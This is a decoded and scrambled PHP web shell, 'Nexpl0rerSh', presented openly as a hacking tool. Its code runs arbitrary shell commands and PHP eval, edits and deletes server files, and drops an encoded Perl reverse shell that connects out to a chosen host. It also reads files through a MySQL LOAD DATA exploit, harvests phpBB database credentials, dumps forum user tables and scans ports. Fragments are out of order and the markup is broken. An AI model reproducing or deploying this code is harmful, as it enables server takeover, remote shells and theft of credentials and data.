/* Decoded by unphp.net */ Safe Mode: ON
"; goto vQJqc; dTS_Y: ini_get("allow_url_fopen") == 1 ? $auf = $auf_on_msg : ($auf = $auf_off_msg); goto tB_ou; HMyaE: if ($_POST["mode"] == "domkfile") { $dir == realpath(".") ? $file = $_POST["mkfile"] : ($file = $dir . $_POST["mkfile"]); $fh = fopen($file, "w+") or die("Error: cannot create file"); $_POST["text"] = ini_get("magic_quotes_gpc") ? stripslashes($_POST["text"]) : $_POST["text"]; fwrite($fh, $_POST["text"]) or die("Error: cannot write to file"); fclose($fh); $output .= "Made."; } goto PGCay; cJtgm: if ($_POST["mode"] == "sqlexploit") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $path = $_POST["path"]; $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);"; $delete = "DROP TABLE `nexpl0it`;"; $bypass = "LOAD DATA LOCAL INFILE '{$path}' INTO TABLE nexpl0it;"; $fuck = "SELECT * FROM nexpl0it;"; mysql_query($delete); mysql_query($query); mysql_query($bypass) or die("Mysql-exploit-error : " . mysql_error()); $res = mysql_query($fuck) or die(mysql_error()); $txt = ''; while ($row = mysql_fetch_array($res)) { $txt .= $row[path] . " "; } $output = "
File : \xa

"; } goto l68qU; p9VuD: echo PHP_OS; goto hdKVK; BKIMW: ?> \xa
\xa \x9 \x9

\xa\x9

\xa \x9\x9\xa Hashes:
\x9
md5 - \x9
crypt - \xa \x9\x9
sha1 -
\x9 \x9 crc32 -
Url:

urlencode -
urldecode - \xa
Base64:
base64_encode -
base64_decode -  

Base convertations:\xa
dec2hex -
"; break; case "scanner": $scandir = str_replace(realpath("."), '', $dir); $scannersh = $dir; if ($scannersh == '') { $scannersh = "/"; } chdir($scannersh); $evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero"); $output .= "
Ho analizzato {$scannersh}
"; $checked = array(); foreach (glob("*.php*") as $file) { $a = fopen($file, "r+"); $b = fread($a, filesize($file)); for ($i = 0; $i < count($evil); $i++) { $me = array_reverse(explode("/", $_SERVER["PHP_SELF"])); $str = eregi($evil[$i], $b); if ($str !== FALSE and $file != $me[0] and !in_array($file, $checked)) { array_push($checked, $file); $output .= "Trovato Possibile {$evil[$i]} in {$file}
"; } } fclose($a); } break; case "proxy": $output = "
url: \xa\x9\x9\x9 \xa \x9 \xa \x9 use curl use fopen
\xa


"; break; } } goto s5L8R; Cpo1U: $uid = "Uid: " . getmyuid() . " Gid: " . getmygid() . "
"; goto NXSQq; KhM9W: ?> " size="26" />
:: Bind Port ::
:: MySQL Panel ::
{" . stripslashes($_POST[query]) . "} mysql says:" . mysql_error()); $pars = array_keys(mysql_fetch_array($query)); $npars = count($pars); $qwords = explode(" ", $_POST["query"]); global $select, $table_name; if (strtolower($qwords[0]) == "select") { $select = TRUE; $nqw = count($qwords); for ($i = 0; $i < $nqw; $i++) { if (strtolower($qwords[$i]) == "from") { $table_name = $qwords[$i + 1]; break; } } } $parz = $pars; $p4rz = $parz; $output .= "
\xa
\xa
\xa\xa \xa \xa "; $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "\xa "; } $output .= "
--[ Table List ]--
" . $table[0] . "
\xa \xa \xa \xa \xa \xa
--[ Query Result ]--
\xa "; $output .= "\xa"; foreach ($pars as $par) { $output .= is_numeric($par) || $par == '' ? '' : "\xa"; } $output .= ""; mysql_data_seek($query, 0); while ($row = mysql_fetch_array($query, MYSQL_ASSOC)) { $w = ''; $i = 0; foreach ($row as $k => $v) { $name = mysql_field_name($query, $i); $w .= " `" . $name . "` = \'" . addslashes($v) . "\' AND"; $i++; } if (count($row) > 0) { $w = substr($w, 0, strlen($w) - 3); } if ($table_name == "mybb_users") { $w = " uid=\'" . $row["uid"] . "\' "; } if ($table_name == "phpbb_users") { $w = " user_id=\'" . $row["user_id"] . "\' "; } $output .= ""; $output .= "\xa"; foreach ($row as $pardd => $rowval) { if (!is_numeric($pardd) && !empty($pardd)) { if ($row[$pardd] == '') { $output .= ""; } else { $output .= ""; } } } $output .= ""; } $output .= "
 " . $par . "
NULL" . $row[$pardd] . "

"; } goto qVmmY; viyX4: $percentfree = round($freespace * 100 / $totalspace); goto bYNNj; PGCay: if ($_POST["mode"] == "delfile") { $dir == realpath(".") ? $file = $_POST["delfile"] : ($file = $dir . $_POST["delfile"]); unlink($file) or die("Error: cannot delete file"); $output .= "File deleted."; } goto az06a; bOCOh: if ($_POST["mode"] == "doedit") { $dir == realpath(".") ? $file = $_POST["modfile"] : ($file = $dir . $_POST["modfile"]); $output .= $file . "
"; $fh = fopen($file, "w+") or die("Error: cannot open file"); $_POST["newtext"] = ini_get("magic_quotes_gpc") ? stripslashes($_POST["newtext"]) : $_POST["newtext"]; fwrite($fh, $_POST["newtext"]) or die("Error: cannot write to file"); fclose($fh); $output .= "Done."; } goto vEqeH; MDzli: ?> ";
:: Edit file ::
name
:: Make File ::
name
:: Delete File ::
name
:: upload ::
:: Rename File ::
:: Make Dir ::
name
:: Cmd Execution ::
:: BackConn ::
" . htmlspecialchars($b) . DIRECTORY_SEPARATOR . ""; $i++; } goto m_EEw; ZtUEj: if ($_POST["mode"] == "eval") { chdir($dir); eval(stripslashes($_POST["eval"])); die; } goto WM1_5; AM3A5: echo $reglobals; goto jzfaJ; MmW5c: $i = 0; goto S0MVT; qVmmY: if ($_POST["mode"] == "update") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $conditions = urldecode(stripslashes($_POST["conditions"])); $table = $_POST["table"]; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1") or die(mysql_error()); $output .= "\xa \xa
\xa
\xa\xa\xa
\xa \xa \xa "; $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "\xa \xa "; } $output .= "
--[ Table List ]--
" . $table[0] . "
 \xa
--[ Query Result ]--
\xa "; while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) { foreach ($row as $k => $v) { $output .= ""; } } $output .= "\xa
{$k}
"; } goto x1YkZ; ngXCB: function exa($cfe) { $res = ''; if (!empty($cfe)) { if (function_exists("exec")) { @exec($cfe, $res); $res = join("\xa", $res); } elseif (function_exists("shell_exec")) { $res = @shell_exec($cfe); } elseif (function_exists("system")) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists("passthru")) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } } return $res; } goto ogY64; wgueM: echo $_SERVER["SERVER_ADDR"]; goto c0I31; oNJrc: echo $gpc; goto vLfEF; KnCOR: function whicha($pr) { $path = exa("which {$pr}"); if (!empty($path)) { return $path; } else { return $pr; } } goto ngXCB; jzfaJ: echo $current_user; goto jTav2; NXSQq: if ($_POST["mode"] == '') { $_POST["mode"] = "ls"; } goto ctnEe; I41_y: $reglobals_on_msg = "Register Globals: ON
"; goto apvn8; wJg_X: echo $totalspace; goto feQhy; UDURP: ?> " size="9" /> (Cannot rename file"; } else { $output = "File renamed."; } } goto BcLrB; wPR2p: echo isset($_COOKIE[mysql_name]) ? $_COOKIE[mysql_name] : "database"; goto EpBTa; J8nqh: $_nexpwd = "p4ssw0rdZ"; goto TYcYJ; vEqeH: if ($_POST["mode"] == "mkfile") { $dir == realpath(".") ? $file = $_POST["mkfile"] : ($file = $dir . $_POST["mkfile"]); $output .= "

"; } goto HMyaE; ctnEe: if ($_POST["mode"] == "ls") { $output .= "

Directory listing [ {$dir} ]
"; $output .= "\xa\xa \xa \xa \xa "; $opendir = opendir($dir) or print "Can't open directory"; $i = 1; while ($file = readdir($opendir)) { $color = "#333333"; $icons = array("txt" => "ext_txt", "ini" => "ext_txt", "sql" => "ext_txt", "php" => "ext_php", "pl" => "ext_pl", "html" => "ext_html", "htm" => "ext_html", "mp3" => "ext_mp3", "swf" => "ext_swf", "rar" => "ext_tar", "zip" => "ext_tar", "tar" => "ext_tar", "gz" => "ext_tar", "bz" => "ext_tar", "exe" => "ext_exe", "jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg"); if ($dir == realpath(".")) { if (is_file($file)) { $ext = array_pop(explode(".", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "small_unk"; } if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "{$info}"; } elseif (!is_writable($file)) { $info = "{$info}"; } else { $info = "{$info}"; } $output .= " \xa \xa \xa \xa "; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "{$info}"; } elseif (!is_writable($file)) { $info = "{$info}"; } else { $info = "{$info}"; } $output .= " \xa "; $output .= "\xa\x9\xa \xa "; } } else { chdir($dir); if (is_file($file)) { $ext = array_pop(explode(".", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "small_unk"; } if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "{$info}"; } elseif (!is_writable($file)) { $info = "{$info}"; } else { $info = "{$info}"; } $output .= " \xa \xa \xa \xa "; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "{$info}"; } elseif (!is_writable($file)) { $info = "{$info}"; } else { $info = "{$info}"; } $output .= " \xa \xa\x9\xa "; } } $i++; } $output .= ""; } goto zilZl; m_EEw: ?>

Register Globals: OFF
"); goto niQR0; NxT89: die; goto juKuz; vLfEF: ?> "; goto Cpo1U; bYNNj: $percentbusy = 100 - $percentfree; goto eRXYx; EpBTa: ?> " size="10" />
perms  nameowner/group actions
" . $info . " " . $file . " " . $owner . " -
" . $info . " " . $file . "" . $owner . "Go
" . $info . " " . $file . "" . $owner . " -
" . $info . " " . $file . "" . $owner . " Go
:: PHP Execution ::
:: Go Dir ::
:: Proxy ::
url: curl fopen
:: File Change Mode::
:: Port Scan ::
Safe Mode: OFF
"; goto JoxvX; lufJS: if ($_POST["mode"] == "scan") { $opent = array(); $host = $_POST[host]; $range = range($_POST[min_port], $_POST[max_port]); foreach ($range as $port) { $con = fsockopen($host, $port, $errno, $errstr, 12); if ($con) { $opent[] = $port; } } $output = "Found " . count($opent) . " opened ports:
"; while (list($num, $value) = each($opent)) { $output .= "{$num} : {$value}
"; } } goto MXWZj; o_REo: echo isset($_COOKIE[mysql_host]) ? $_COOKIE[mysql_host] : "host"; goto l39TP; gn1XG: echo $auf; goto BKIMW; y_4Tz: if ($_POST["mode"] == "reverse") { chdir($dir); $os = substr(strtoupper(PHP_OS), 0, 3); $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQokc3lzID0gJEFSR1ZbMl07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzZTogcmV2ZXJzZS5wbCA8WW91ckhvc3Q+IDxZb3VyUG9ydD4gPHN5c3RlbT5cbiI7DQogIHByaW50ZiAiWypdIE5vdGU6IHN5c3RlbSBjYW4gYmUgTElOIG9yIFdJTiI7DQogIGV4aXQoMSk7DQp9DQppZiAoJHN5cyBlcSAiTElOIikgeyAkY21kID0gIi9iaW4vYmFzaCI7IH0NCmlmICgkc3lzIGVxICJXSU4iKSB7ICRjbWQgPSAiQzpcXFdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlIjsgfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nLi4uIFskaG9zdF1cbiI7DQokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyB1IGNhbiBjaGFuZ2UgdGhpcw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90KSB8fCBkaWUgKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30NCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IFJldmVyc2UgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMgKCRjbWQpOyA="); fwrite(fopen("reverse.pl", "w+"), $txt); exa("perl reverse.pl " . $_POST[ip] . " " . $_POST[port] . " " . $os); unlink("reverse.pl"); } goto cJtgm; RHFlS: function datadump($table) { $result .= "# Dump of {$table} \xa"; $result .= "# Dump DATE : " . date("d-M-Y") . "\xa "; $query = mysql_query("select * from {$table}"); $num_fields = @mysql_num_fields($query); $numrow = mysql_num_rows($query); for ($i = 0; $i < $numrow; $i++) { $row = mysql_fetch_row($query); $result .= "INSERT INTO " . $table . " VALUES("; for ($j = 0; $j < $num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = ereg_replace(" ", "\n", $row[$j]); if (isset($row[$j])) { $result .= ""{$row[$j]}""; } else { $result .= """"; } if ($j < $num_fields - 1) { $result .= ","; } } $result .= ");\xa"; } return $result . "\xa \xa"; } goto KnCOR; vQJqc: $gpc_off_msg = "Magic Quotes: OFF
"; goto wxqhS; zilZl: if ($_POST["mode"] == "edit") { $dir == realpath(".") ? $file = $_POST["modfile"] : ($file = $dir . $_POST["modfile"]); $content = file_get_contents($file); if ($_POST[modfile] == "config.php") { include $file; $link = "javascript:var form=document.sqlpanel; form.user.value='" . addslashes($dbuser) . "';form.pass.value='" . addslashes($dbpasswd) . "';form.host.value='" . addslashes($dbhost) . "';form.dbname.value='" . addslashes($dbname) . "';document.sqlpanel.submit();"; $output .= "phpBB config file detected! click here to connect
"; } $output .= "

"; } goto bOCOh; x1YkZ: if ($_POST["mode"] == "update2") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $conditions = urldecode(stripslashes(stripslashes($_POST["conditions"]))); $table = $_POST["table"]; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1") or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1

" . mysql_error()); $uno = mysql_fetch_array($select, MYSQL_ASSOC); $pars = array_keys($uno); $query = "UPDATE {$table} SET"; foreach ($pars as $fields) { $query .= " {$fields}='{$_POST[$fields]}',"; } $query = substr($query, 0, strlen($query) - 1); $query .= " WHERE{$conditions}"; $output = "Executed query: {$query}

"; mysql_query($query) or die("QUERY: " . $query . "

ERROR:" . mysql_error()); } goto uHiaa; lBiCO: ?>
!Nexpl0rerSh v3.4.3 BL4cK Release!
Shell info: Author: Nexen Release Date: 1 June 2008
PHP Version: %)
Magic Quotes: ON
"; goto fTbem; AMhUj: ?>